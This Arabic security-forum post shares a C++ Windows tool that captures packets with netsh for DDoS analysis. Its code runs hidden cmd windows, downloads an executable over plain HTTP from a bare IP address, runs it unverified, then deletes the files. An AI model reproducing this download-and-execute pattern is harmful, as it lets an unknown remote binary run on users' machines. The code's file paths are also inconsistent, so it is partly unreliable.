الحماية للأبد -Security 4 Ever

الحماية للأبد -Security 4 Ever (https://www.sec4ever.com/home/index.php)
-   المشاريع التطويرية مفتوحة المصدر (https://www.sec4ever.com/home/forumdisplay.php?f=54)
-   -   capture packets تحليل هجمات الديدوس (https://www.sec4ever.com/home/showthread.php?t=19911)

TW!$T3R 27-04-2022 11:22 PM

capture packets تحليل هجمات الديدوس
 
capture packet, Convert etl to pcap, save it to your dekstop.

برنامج كتبته بلغة السي بلس يفيد الوندوز لتحليل هجمات الديدوس .. بباسطه عمله خلال هجمه يقوم بجمع الباكتس وتحويل الملف من etl الى pcap باستعمال etl2pcap لتستطيع قراءته بواير شارك او ايا كان .. يفيد في تحليل هجمات الديدوس المصدر والايبيات ونوع الهجمه مثلا TCP , UDP , DNS والبورتات المستهدفه .

capture.cpp
كود:

// capture.cpp : This file contains the 'main' function. Program execution begins and ends there.
//

#include <iostream>
#include<windows.h>
#include <shellapi.h>
#include <string>
#include <cstdio>
#pragma comment(lib, "Urlmon.lib")
using namespace std;

int main()
{
 
    system("title TCPGuard.com");

    wstring comm = L"";

    comm.append(L"/k C:\\Windows\\System32\\netsh.exe trace start capture=yes tracefile=C:\\Users\\%username%\\Desktop\\capture.etl");
    comm.append(L" && exit ");

        HINSTANCE retVal = ShellExecuteW(NULL, L"open", L"cmd", comm.c_str(), NULL, SW_HIDE);
    cout << "TCPGuard.com Capturing Packets.." << endl;
    Sleep(10000);


    comm = L"";
    comm.append(L"/k C:\\Windows\\System32\\netsh.exe trace stop");
    comm.append(L" && exit ");

    ShellExecuteW(NULL, L"open", L"cmd", comm.c_str(), NULL, SW_HIDE);

    cout << "Collecting Data.. Please Wait" << endl;
    Sleep(86800);

    cout << "Downloading converter..." << endl;
    const wchar_t* srcURL = L"http://45.135.202.202/etl.exe";

    const wchar_t* destFile = L"etl2pcap.exe";
    if (S_OK == URLDownloadToFile(NULL, srcURL, destFile, 0, NULL))
    {
        cout << "Download Converter Success" << endl;
    }
    else
    {
        cout << "Failed to Download" << endl;
    }
    Sleep(5000);
    cout << "Converting.." << endl;
   
   
    comm = L"";
    comm.append(L"/k C:\\Users\\%username%\\Desktop\\etl2pcap.exe capture.etl %date:~10,4%%date:~7,2%%date:~4,2%_%time:~1,1%%time:~3,2%.pcap");
    comm.append(L" && exit ");

    ShellExecuteW(NULL, L"open", L"cmd", comm.c_str(), NULL, SW_HIDE);
    Sleep(8000);


    comm = L"";
    comm.append(L"/k del C:\\Users\\%username%\\Desktop\\*.cab && del C:\\Users\\%username%\\Desktop\\*.etl && del C:\\Users\\%username%\\Desktop\\etl2pcap.exe");
    comm.append(L" && exit ");

    ShellExecuteW(NULL, L"open", L"cmd", comm.c_str(), NULL, SW_HIDE);


    cout << "all done" << endl;



 
    system("pause");
 

}

المشروع على جت هب
https://github.com/TcpGuard/Netsh-pcap


الساعة الآن 04:47 AM

Powered by vBulletin® Copyright ©2000 - 2022, Jelsoft Enterprises Ltd.